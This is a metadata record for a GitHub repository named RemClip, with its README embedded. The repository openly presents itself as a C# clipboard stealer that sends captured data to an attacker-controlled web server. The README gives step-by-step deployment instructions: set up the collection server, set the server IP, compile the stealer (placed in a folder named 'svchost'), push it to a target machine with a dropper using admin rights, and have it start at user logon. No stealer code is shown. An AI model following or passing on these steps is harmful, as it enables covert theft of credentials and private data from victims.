{"id":22647343,"url":"https://github.com/processust/remclip","last_synced_at":"2025-04-12T02:12:33.003Z","repository":{"id":82910980,"uuid":"578971072","full_name":"ProcessusT/RemClip","owner":"ProcessusT","description":"RemClip is a C# project which permits to steal user clipboard data and send it to a remote web server under attacker control","archived":false,"fork":false,"pushed_at":"2024-09-02T11:33:41.000Z","size":5982,"stargazers_count":12,"open_issues_count":0,"forks_count":4,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-12T02:12:27.349Z","etag":null,"topics":["clipboard","credentials","remote","stealer"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProcessusT.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-12-16T10:34:20.000Z","updated_at":"2025-03-14T20:38:02.000Z","dependencies_parsed_at":null,"dependency_job_id":"8e1ee7f8-c147-401e-9b8c-811b550fef09","html_url":"https://github.com/ProcessusT/RemClip","commit_stats":{"total_commits":12,"total_committers":1,"mean_commits":12.0,"dds":0.0,"last_synced_commit":"2d07a726efc24f18970fbf8da50b9fcc4399bd5e"},"previous_names":["processust/remclip"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FRemClip","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FRemClip/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FRemClip/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FRemClip/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ProcessusT","download_url":"https://codeload.github.com/ProcessusT/RemClip/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248505926,"owners_count":21115354,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["clipboard","credentials","remote","stealer"],"created_at":"2024-12-09T07:33:26.168Z","updated_at":"2025-04-12T02:12:32.984Z","avatar_url":"https://github.com/ProcessusT.png","language":"PHP","readme":"\u003cdiv align=\"center\"\u003e\n  \u003cbr\u003e\n  \u003ca href=\"https://twitter.com/intent/follow?screen_name=ProcessusT\" title=\"Follow\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/ProcessusT?label=ProcessusT\u0026style=social\"\u003e\u003c/a\u003e\n  \u003cbr\u003e\n  \u003ch1\u003e\n    The RemClip project\n  \u003c/h1\u003e\n  \u003cbr\u003e\u003cbr\u003e\n  forked from \u003ca href=\"https://gist.github.com/emoacht/c75bab17a4584c77cf64\"\u003ehttps://gist.github.com/emoacht/c75bab17a4584c77cf64\u003c/a\u003e\n\u003c/div\u003e \u003cbr\u003e\u003cbr\u003e\n\u003e RemClip is a C# project which permits to steal user clipboard data and send it to a remote web server under attacker control\n\u003cbr /\u003e\n\u003cbr\u003e\n\u003cdiv align=\"center\"\u003e\n\u003cimg src=\"https://raw.githubusercontent.com/ProcessusT/RemClip/main/.assets/background.PNG\" width=\"80%;\"\u003e\n\u003c/div\u003e\n\u003cbr\u003e\n\u003cbr /\u003e\n\u003cbr /\u003e\n\n## Installation\n\u003cbr\u003e\n- Just put the \"web server\" folder content in your own web server folder with PDO and Sqlite installed\u003cbr\u003e\n\u003cbr\u003e\n- In the \"svchost - source code\" folder, which is the stealer source code, modify the \"server_ip\" in Main function to your own web server IP address\u003cbr\u003e\n- Then compile it with Visual Studio Code with the following command line :\u003cbr\u003e\u003cbr\u003e\n\n\n```python\ndotnet publish -p:PublishSingleFile=true -r win-x64 -c Release --self-contained true -p:PublishTrimmed=true\n```\n\n- Move the new compiled binary from svchost\\bin\\Release\\net7.0\\win-x64\\publish to the python dropper folder\u003cbr\u003e\n- Remotely upload your compiled stealer to your target computer with the dropper script (need admin privs on target)\u003cbr\u003e\n- The binary will be started on next user logon\u003cbr\u003e\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fremclip","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprocessust%2Fremclip","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fremclip/lists"}